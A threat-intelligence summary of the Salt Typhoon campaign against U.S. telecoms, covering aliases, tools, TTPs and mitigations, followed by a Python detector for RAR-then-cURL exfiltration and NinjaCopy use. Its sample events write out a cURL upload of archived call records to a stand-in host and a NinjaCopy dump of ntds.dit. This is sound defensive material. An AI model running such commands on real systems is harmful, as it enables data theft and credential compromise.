Full Report
U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information. The adversaries, tracked as Salt Typhoon, breached the company as part of a "monthslong campaign" designed to harvest cellphone communications of "high-value intelligence targets." It's not clear what information was taken, if any,
Analysis Summary
# Threat Actor: Salt Typhoon
## Attribution & Identity
* **Attribution:** Chinese threat actors, People's Republic of China (PRC)-affiliated.
* **Known Aliases:** Earth Estries, FamousSparrow, GhostEmperor, UNC2286.
* **Associated Groups:** Overlaps with the China-linked group Tropic Trooper, which previously used predecessor versions of the HemiGate and Crowdoor malware.
## Activity Summary
Salt Typhoon has been active since at least 2020. The group conducted a "monthslong campaign" focused on breaching major U.S. telecommunications companies, including T-Mobile, AT&T, Verizon, and Lumen Technologies. The objective of this campaign appears to be cyber espionage, specifically harvesting cellphone communications of "high-value intelligence targets" and stealing customer call records data and private communications of individuals involved in government or political activity. The group was also previously linked to attacks targeting government and technology industries in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. in August 2023.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting vulnerabilities in outside-facing services or remote management utilities (e.g., vulnerable/misconfigured QConvergeConsole installations).
* **Delivery/Payloads:** Delivering malware such as Cobalt Strike, custom stealer TrillClient, and backdoors (HemiGate, Crowdoor, Zingdoor, Snappybee/Deed RAT).
* **Persistence:** Continuously updating tools, employing backdoors, and using scheduled tasks for persistence.
* **Lateral Movement & C2 Concealment:** Utilizing backdoors for lateral movement and credential theft. Repurposing a victim's proxy server to forward traffic to the actual C2 server to conceal malicious traffic.
* **Discovery & Data Staging:** Using PortScan for network discovery and mapping, and NinjaCopy for credential extraction. Collected data is staged in RAR archives before exfiltration.
* **Exfiltration:** Using cURL to send archived data to anonymized file-sharing services, employing proxies to hide backdoor traffic.
* **Additional Backdoors Observed:** Cryptmerlin (executes C2 commands) and FuxosDoor (an IIS implant on compromised Exchange Servers to run commands via cmd.exe).
## Targeting
* **Sectors:** Commercial Telecommunications (Telecoms Giants).
* **Geography:** United States primarily, with prior activity noted in the Philippines, Taiwan, Malaysia, South Africa, and Germany.
* **Victims:** T-Mobile, AT&T, Verizon, and Lumen Technologies.
## Tools & Infrastructure
* **Malware Families Used:** Cobalt Strike, TrillClient (custom Go-based stealer), HemiGate, Crowdoor (variant of SparrowDoor), Zingdoor, Snappybee (Deed RAT, suspected ShadowPad successor), Cryptmerlin, FuxosDoor.
* **Utility Tools:** cURL, NinjaCopy, PortScan.
* **Infrastructure:** Anonymized file-sharing services serve as exfiltration endpoints, and repurposed victim proxy servers forward traffic to the actual command-and-control (C2) server to conceal it.
## Implications
Salt Typhoon represents a sophisticated and adaptable cyber espionage threat actor aligned with the PRC. Its sustained targeting of critical U.S. telecommunications infrastructure demonstrates a strategic intent to position itself for large-scale intelligence collection against high-value government and political targets who use these networks. Its layered approach, blending custom tools, publicly available malware, and defense-evasion techniques (such as proxy repurposing), makes the group difficult to detect and evict.
## Mitigations
* **Patch and Harden:** Focus immediate remediation efforts on external-facing services, especially remote management utilities, to prevent initial access via known vulnerabilities (like QConvergeConsole exploitation).
* **Network Monitoring:** Implement granular monitoring for anomalous outbound traffic, especially connections to anonymized file-sharing services via tools like cURL, as this is a key exfiltration technique.
* **Egress Filtering/Proxy Review:** Scrutinize proxy server configurations for unusual traffic forwarding that might indicate reuse by attackers for C2 concealment.
* **Endpoint Detection:** Deploy robust endpoint detection and response to identify the deployment and execution of the observed bespoke tooling (the TrillClient stealer and the Cryptmerlin and FuxosDoor backdoors).
* **Credential Protection:** Implement advanced credential monitoring and restrict lateral movement paths, particularly focusing on identifying usage of tools like NinjaCopy.
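As an added example (not part of the report, and not any vendor's detection content), the following Python script applies the Network Monitoring and Credential Protection recommendations above to constructed process-creation events: it flags a host that stages data with RAR and then uploads with cURL within a short window, and any Invoke-NinjaCopy invocation. The event format, hostnames, paths and domains are assumptions.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry). Host ws-17
# archives data with RAR and uploads it with cURL; ws-04 runs NinjaCopy.
SAMPLE_EVENTS = [
    r'{"ts":"2024-11-15T02:10:05","host":"ws-17","cmd":"rar.exe a -hp C:\\Users\\Public\\out.rar C:\\Data\\cdr"}',
    r'{"ts":"2024-11-15T02:14:40","host":"ws-17","cmd":"curl.exe -T C:\\Users\\Public\\out.rar https://share.example/upload"}',
    r'{"ts":"2024-11-15T03:00:00","host":"ws-04","cmd":"curl.exe https://updates.example/manifest.json"}',
    r'{"ts":"2024-11-15T03:05:00","host":"ws-04","cmd":"powershell -ep bypass Invoke-NinjaCopy -Path C:\\Windows\\NTDS\\ntds.dit"}',
]

ARCHIVER_RE = re.compile(r"rar\.exe\s+a\s", re.I)            # RAR 'a' (add to archive) command
UPLOAD_RE = re.compile(r"curl(?:\.exe)?\b.*(?:-T|--upload-file|-F|--data-binary)\b", re.I)
NINJACOPY_RE = re.compile(r"Invoke-NinjaCopy", re.I)         # raw-disk copy of locked files (e.g. NTDS.dit)
WINDOW = timedelta(minutes=30)                               # assumed staging-to-upload window


def parse_events(lines):
    """Parse JSON-lines events and return them ordered by timestamp."""
    events = []
    for line in lines:
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def detect(lines):
    """Return (host, rule) alerts for the RAR-then-cURL and NinjaCopy patterns."""
    alerts = []
    last_archive = {}  # host -> timestamp of the most recent RAR 'add' command
    for event in parse_events(lines):
        host, cmd = event["host"], event["cmd"]
        if ARCHIVER_RE.search(cmd):
            last_archive[host] = event["ts"]
        elif UPLOAD_RE.search(cmd):
            staged_at = last_archive.get(host)
            # Only an upload that follows archiving on the same host is suspicious here;
            # a plain curl download (ws-04) does not fire.
            if staged_at is not None and event["ts"] - staged_at <= WINDOW:
                alerts.append((host, "rar_then_curl_upload"))
        if NINJACOPY_RE.search(cmd):
            alerts.append((host, "ninjacopy_credential_access"))
    return alerts


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT host={host} rule={rule}")
```

In production the archiver and upload patterns would be fed from EDR process telemetry, and the upload rule should additionally check the destination against known anonymized file-sharing domains.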